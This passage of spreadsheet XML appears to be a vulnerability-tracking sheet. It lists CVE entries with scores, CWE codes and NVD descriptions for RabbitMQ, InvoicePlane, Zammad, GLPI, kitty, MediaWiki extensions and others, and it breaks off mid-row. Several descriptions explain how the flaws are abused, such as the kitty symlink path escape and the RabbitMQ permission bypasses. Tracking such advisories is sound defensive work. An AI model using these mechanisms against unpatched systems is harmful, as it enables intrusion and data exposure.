      <c r="M380" s="5" t="inlineStr"/>
      <c r="N380" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O380" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P380" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q380" s="5" t="inlineStr"/>
      <c r="R380" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-532</t>
        </is>
      </c>
      <c r="S380" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, when a Microsoft Graph request fails, Zammad logs the error including the authentication token used to access the mailbox. The system attempts to hide this token in the log, but the masking is incomplete: for the token format Microsoft uses (JWT), only the first part is hidden, while the remaining parts remain readable in plain text. A Zammad admin with Microsoft Graph channel access can view these logs and see the partial token, which may reveal sensitive claims such as the account scope, tenant, or timing, and could assist in reconstructing the full token while it is still valid. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63208</t>
        </is>
      </c>
    </row>
    <row r="381">
      <c r="A381" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B381" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67407</t>
        </is>
      </c>
      <c r="D381" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E381" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F381" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G381" s="5" t="inlineStr"/>
      <c r="H381" s="5" t="inlineStr"/>
      <c r="I381" s="5" t="inlineStr"/>
      <c r="J381" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K381" s="5" t="inlineStr"/>
      <c r="L381" s="5" t="inlineStr"/>
      <c r="M381" s="5" t="inlineStr"/>
      <c r="N381" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O381" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P381" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q381" s="5" t="inlineStr"/>
      <c r="R381" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S381" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.0.0 until 4.3.3 and 4.2.9 and 4.1.14 and 4.0.23, Incomplete fix for CVE-2026-44838: escaperegexchar/1 does not escape -, leaving room for an MQTT topic permission bypass. the CVE-2026-44838 fix made expandtopicpermission/2 escape regex metacharacters in expanded topic-permission variables (escaperegex(V)), but escaperegexchar/1 escapes \ ^ $ . | ? + ( ) [ ] { } and omits -. When a topic permission template places {clientid} inside a [...] character class A low-privileged authenticated MQTT user controlling its clientid can broaden topic authorization (read and write) when templates embed {clientid} in a [...] This issue is fixed in versions 4.3.3 and 4.2.9 and 4.1.14 and 4.0.23.</t>
        </is>
      </c>
      <c r="T381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67407</t>
        </is>
      </c>
    </row>
    <row r="382">
      <c r="A382" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B382" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100502</t>
        </is>
      </c>
      <c r="D382" s="5" t="n">
        <v>5</v>
      </c>
      <c r="E382" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F382" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G382" s="5" t="inlineStr"/>
      <c r="H382" s="5" t="inlineStr"/>
      <c r="I382" s="5" t="inlineStr"/>
      <c r="J382" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K382" s="5" t="inlineStr"/>
      <c r="L382" s="5" t="inlineStr"/>
      <c r="M382" s="5" t="inlineStr"/>
      <c r="N382" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O382" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P382" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q382" s="5" t="inlineStr"/>
      <c r="R382" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="S382" s="5" t="inlineStr">
        <is>
          <t>Flame through 2.4.0 contains an insufficient session expiration vulnerability in the login endpoint that allows attackers with former admin access to obtain tokens with arbitrary lifespans by supplying unvalidated duration parameters. Attackers can mint near-permanent administrator tokens that survive password changes, retaining full control of the dashboard since tokens are verified only against a static JWT secret that is never rotated.</t>
        </is>
      </c>
      <c r="T382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100502</t>
        </is>
      </c>
    </row>
    <row r="383">
      <c r="A383" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B383" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17602</t>
        </is>
      </c>
      <c r="D383" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E383" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F383" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G383" s="5" t="inlineStr"/>
      <c r="H383" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I383" s="5" t="inlineStr"/>
      <c r="J383" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K383" s="5" t="inlineStr"/>
      <c r="L383" s="5" t="inlineStr"/>
      <c r="M383" s="5" t="inlineStr"/>
      <c r="N383" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O383" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P383" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q383" s="5" t="inlineStr"/>
      <c r="R383" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S383" s="5" t="inlineStr">
        <is>
          <t>The SSL Zen — SSL Certificate Installer &amp; HTTPS Redirects plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 4.7.42 via the 'file_name' parameter parameter. This makes it possible for authenticated attackers, with administrator-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.</t>
        </is>
      </c>
      <c r="T383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17602</t>
        </is>
      </c>
    </row>
    <row r="384">
      <c r="A384" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B384" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39372</t>
        </is>
      </c>
      <c r="D384" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E384" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F384" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G384" s="5" t="inlineStr"/>
      <c r="H384" s="5" t="inlineStr"/>
      <c r="I384" s="5" t="inlineStr"/>
      <c r="J384" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K384" s="5" t="inlineStr"/>
      <c r="L384" s="5" t="inlineStr"/>
      <c r="M384" s="5" t="inlineStr"/>
      <c r="N384" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O384" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P384" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q384" s="5" t="inlineStr"/>
      <c r="R384" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-359</t>
        </is>
      </c>
      <c r="S384" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane stores and serves uploaded image attachments without stripping EXIF metadata. When an administrator uploads an image through invoice attachments, quote attachments, or another attachment feature and shares it with another user, the recipient can retrieve embedded GPS coordinates, timestamps, and device information. The preserved metadata can disclose private location and device details across users. This vulnerability is fixed in 1.7.2.</t>
        </is>
      </c>
      <c r="T384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39372</t>
        </is>
      </c>
    </row>
    <row r="385">
      <c r="A385" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B385" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100376</t>
        </is>
      </c>
      <c r="D385" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E385" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F385" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G385" s="5" t="inlineStr"/>
      <c r="H385" s="5" t="inlineStr"/>
      <c r="I385" s="5" t="inlineStr"/>
      <c r="J385" s="5" t="inlineStr"/>
      <c r="K385" s="5" t="inlineStr"/>
      <c r="L385" s="5" t="inlineStr"/>
      <c r="M385" s="5" t="inlineStr"/>
      <c r="N385" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O385" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P385" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q385" s="5" t="inlineStr"/>
      <c r="R385" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S385" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation Mediawiki - TemplateSandbox Extension allows Cross-Site Scripting (XSS).
This issue affects Mediawiki - TemplateSandbox Extension: from * before 1.46.1, 1.45.5, 1.43.10.</t>
        </is>
      </c>
      <c r="T385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100376</t>
        </is>
      </c>
    </row>
    <row r="386">
      <c r="A386" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B386" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100383</t>
        </is>
      </c>
      <c r="D386" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E386" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F386" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G386" s="5" t="inlineStr"/>
      <c r="H386" s="5" t="inlineStr"/>
      <c r="I386" s="5" t="inlineStr"/>
      <c r="J386" s="5" t="inlineStr"/>
      <c r="K386" s="5" t="inlineStr"/>
      <c r="L386" s="5" t="inlineStr"/>
      <c r="M386" s="5" t="inlineStr"/>
      <c r="N386" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O386" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P386" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q386" s="5" t="inlineStr"/>
      <c r="R386" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S386" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation Mediawiki - WikiLambda Extension allows Cross-Site Scripting (XSS).
This issue affects Mediawiki - WikiLambda Extension: 1.47.0-alpha. The issue has been remediated on the `master` branch.</t>
        </is>
      </c>
      <c r="T386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100383</t>
        </is>
      </c>
    </row>
    <row r="387">
      <c r="A387" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B387" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27867</t>
        </is>
      </c>
      <c r="D387" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E387" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F387" s="5" t="inlineStr">
        <is>
          <t>ffb98d57-deaa-4918-a669-5225ccc13e39</t>
        </is>
      </c>
      <c r="G387" s="5" t="inlineStr"/>
      <c r="H387" s="5" t="inlineStr"/>
      <c r="I387" s="5" t="inlineStr"/>
      <c r="J387" s="5" t="inlineStr"/>
      <c r="K387" s="5" t="inlineStr"/>
      <c r="L387" s="5" t="inlineStr"/>
      <c r="M387" s="5" t="inlineStr"/>
      <c r="N387" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O387" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P387" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q387" s="5" t="inlineStr"/>
      <c r="R387" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S387" s="5" t="inlineStr">
        <is>
          <t>An attacker with access via network to the Regesta Smart HD-PLC of the provider Teldat (in this case, registration action is required) who has the vulnerable firmware version could inject
a specific payload via the parameter "cmdcookie" withing the /upgrade/index.html resulting in to a Cross-Site Scripting (XSS). This issue affects Regesta Smart HD-PLC - TLDPH16D2: 
11.02.06.00.02</t>
        </is>
      </c>
      <c r="T387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27867</t>
        </is>
      </c>
    </row>
    <row r="388">
      <c r="A388" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B388" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67241</t>
        </is>
      </c>
      <c r="D388" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E388" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F388" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G388" s="5" t="inlineStr"/>
      <c r="H388" s="5" t="inlineStr"/>
      <c r="I388" s="5" t="inlineStr"/>
      <c r="J388" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K388" s="5" t="inlineStr"/>
      <c r="L388" s="5" t="inlineStr"/>
      <c r="M388" s="5" t="inlineStr"/>
      <c r="N388" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O388" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P388" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q388" s="5" t="inlineStr"/>
      <c r="R388" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S388" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.2.0 until 4.2.9 and 4.3.3, AMQP 1.0 management exchange.declare skips alternate-exchange permission check. pUT /exchanges/:name (lines 192-240) checks only configure on the declared exchange and passes XArgs straight to rabbitexchange:declare/7. It omits the checkreadpermitted(X) + checkwritepermitted(AE) that rabbitchannel.erl:2540-2548 enforces for the alternate-exchange argument on the AMQP 0-9-1 path. The same file already implements the analogous DLX check for queues (lines 708-719), confirming this is a missing-check bug rather than intentional A user with only configure on exchange X can route X's unroutable messages into an alternate exchange they have no write permission AMQP 1.0 enabled (default in RabbitMQ 4.x) Attacker has configure on at least one exchange but lacks write on the target. This issue is fixed in versions 4.2.9 and 4.3.3.</t>
        </is>
      </c>
      <c r="T388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67241</t>
        </is>
      </c>
    </row>
    <row r="389">
      <c r="A389" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B389" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85292</t>
        </is>
      </c>
      <c r="D389" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E389" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F389" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G389" s="5" t="inlineStr"/>
      <c r="H389" s="5" t="inlineStr"/>
      <c r="I389" s="5" t="inlineStr"/>
      <c r="J389" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K389" s="5" t="inlineStr"/>
      <c r="L389" s="5" t="inlineStr"/>
      <c r="M389" s="5" t="inlineStr"/>
      <c r="N389" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O389" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P389" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q389" s="5" t="inlineStr"/>
      <c r="R389" s="5" t="inlineStr">
        <is>
          <t>CWE-697</t>
        </is>
      </c>
      <c r="S389" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane's User_Controller compares the session user_type value with the required role by using PHP's loose inequality operator. Under a non-standard session backend that returns unexpected scalar types, type juggling can cause a value that is not strictly the required role to pass the authorization check. This can permit authentication or authorization bypass in affected session configurations. This issue is fixed in version 1.7.2.</t>
        </is>
      </c>
      <c r="T389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85292</t>
        </is>
      </c>
    </row>
    <row r="390">
      <c r="A390" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B390" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85293</t>
        </is>
      </c>
      <c r="D390" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E390" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F390" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G390" s="5" t="inlineStr"/>
      <c r="H390" s="5" t="inlineStr"/>
      <c r="I390" s="5" t="inlineStr"/>
      <c r="J390" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K390" s="5" t="inlineStr"/>
      <c r="L390" s="5" t="inlineStr"/>
      <c r="M390" s="5" t="inlineStr"/>
      <c r="N390" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O390" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P390" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q390" s="5" t="inlineStr"/>
      <c r="R390" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-87</t>
        </is>
      </c>
      <c r="S390" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. In version 1.7.2-beta-1, InvoicePlane stores client_email values without enforcing email syntax and renders them unescaped inside double-quoted value attributes in the invoice mailer form and quote mailer form. An administrator who can edit a client can store attribute-breaking input, and, when the mailer is configured, JavaScript executes when another authenticated administrator opens the related mailer page. The script runs in the InvoicePlane origin and can perform same-origin actions with the victim's session. This issue is fixed in version 1.7.2.</t>
        </is>
      </c>
      <c r="T390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85293</t>
        </is>
      </c>
    </row>
    <row r="391">
      <c r="A391" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B391" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49469</t>
        </is>
      </c>
      <c r="D391" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E391" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F391" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G391" s="5" t="inlineStr"/>
      <c r="H391" s="5" t="inlineStr"/>
      <c r="I391" s="5" t="inlineStr"/>
      <c r="J391" s="5" t="inlineStr"/>
      <c r="K391" s="5" t="inlineStr"/>
      <c r="L391" s="5" t="inlineStr"/>
      <c r="M391" s="5" t="inlineStr"/>
      <c r="N391" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O391" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P391" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q391" s="5" t="inlineStr"/>
      <c r="R391" s="5" t="inlineStr">
        <is>
          <t>CWE-90</t>
        </is>
      </c>
      <c r="S391" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 0.70 until 10.0.26 and 11.0.8, an authenticated hotliner or technician can submit crafted criteria through the user import feature to bypass the configured default LDAP filter. This allows access to LDAP objects that the default filter was intended to exclude. This issue is fixed in versions 11.0.8 and 10.0.26.</t>
        </is>
      </c>
      <c r="T391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49469</t>
        </is>
      </c>
    </row>
    <row r="392">
      <c r="A392" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B392" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67406</t>
        </is>
      </c>
      <c r="D392" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E392" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F392" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G392" s="5" t="inlineStr"/>
      <c r="H392" s="5" t="inlineStr"/>
      <c r="I392" s="5" t="inlineStr"/>
      <c r="J392" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K392" s="5" t="inlineStr"/>
      <c r="L392" s="5" t="inlineStr"/>
      <c r="M392" s="5" t="inlineStr"/>
      <c r="N392" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O392" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P392" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q392" s="5" t="inlineStr"/>
      <c r="R392" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S392" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.0.0 until 4.3.3, 4.2.9, 4.1.14, and 4.0.23, Shovel does not format state logged by the crash reporter and can leave unencrypted credentials in a crash dump file. the shovel worker genserver processes does not implement the formatstatus/2 callback. When these processes crash (e.g., due to network partitions, connection failures), the OTP SASL error handler writes the full process state , including plaintext AMQP passwords and URIs , to the error log. This is particularly severe for the shovel worker, which stores deobfuscated plaintext URIs (including amqp://user:password@host format) in its genserver state for the entire process Automatic Credential Exposure: Shovel worker crashes (common during network partitions) automatically write plaintext upstream/downstream passwords to error logs No Special Configuration Needed: Unlike DEBUG logging, SASL error reports are always active Broad. This issue is fixed in versions 4.3.3, 4.2.9, 4.1.14, and 4.0.23.</t>
        </is>
      </c>
      <c r="T392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67406</t>
        </is>
      </c>
    </row>
    <row r="393">
      <c r="A393" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B393" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C393" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80430</t>
        </is>
      </c>
      <c r="D393" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E393" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F393" s="5" t="inlineStr">
        <is>
          <t>4daa8cea-433a-44bd-9456-53b127fc289a</t>
        </is>
      </c>
      <c r="G393" s="5" t="inlineStr"/>
      <c r="H393" s="5" t="inlineStr"/>
      <c r="I393" s="5" t="inlineStr"/>
      <c r="J393" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K393" s="5" t="inlineStr"/>
      <c r="L393" s="5" t="inlineStr"/>
      <c r="M393" s="5" t="inlineStr"/>
      <c r="N393" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O393" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P393" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q393" s="5" t="inlineStr"/>
      <c r="R393" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="S393" s="5" t="inlineStr">
        <is>
          <t>Improper Link Resolution Before File Access in the drag source staging path of the drag and drop protocol in kitty from 0.47.0 before 0.49.0 allows a program writing to the terminal to create files and directories at paths outside the staging directory, because subdir_data_for_drag() in kitty/dnd.c resolves a descendant of the staged item tree by constructing a path string and opening it with safe_open(path, O_DIRECTORY | O_RDONLY, 0) rather than by walking the tree one component at a time, so a client that declares two entries with the same name, the first a symlink whose target is an arbitrary absolute path and the second a directory, causes mkdirat() to fail with EEXIST, which the code ignores, and causes the subsequent path resolution to follow the symlink and return a directory descriptor outside the staging directory, which is then passed as the dirfd argument to add_payload() and used for every further create operation on that item and its descendants. Entry names are sanitised against path separators and dot components, but symlink targets are not validated. Files are created with O_CREAT | O_WRONLY | O_EXCL at mode 0644, so existing files cannot be overwritten, and directories are created with mkdirat() at mode 0755, so the attacker can create intermediate directories that did not previously exist. This results in the creation of files and directories at any path writable by the user running kitty, provided the symlink target is an existing directory.</t>
        </is>
      </c>
      <c r="T393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80430</t>
        </is>
      </c>
    </row>
    <row r="394">
      <c r="A394" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B394" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95834</t>
        </is>
      </c>
      <c r="D394" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E394" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F394" s="5" t="inlineStr">
        <is>
          <t>4daa8cea-433a-44bd-9456-53b127fc289a</t>
        </is>
      </c>
      <c r="G394" s="5" t="inlineStr"/>
      <c r="H394" s="5" t="inlineStr"/>
      <c r="I394" s="5" t="inlineStr"/>
      <c r="J394" s="5" t="inlineStr"/>
      <c r="K394" s="5" t="inlineStr"/>
      <c r="L394" s="5" t="inlineStr"/>
      <c r="M394" s="5" t="inlineStr"/>
      <c r="N394" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O394" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P394" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q394" s="5" t="inlineStr"/>
      <c r="R394" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S394" s="5" t="inlineStr">
        <is>
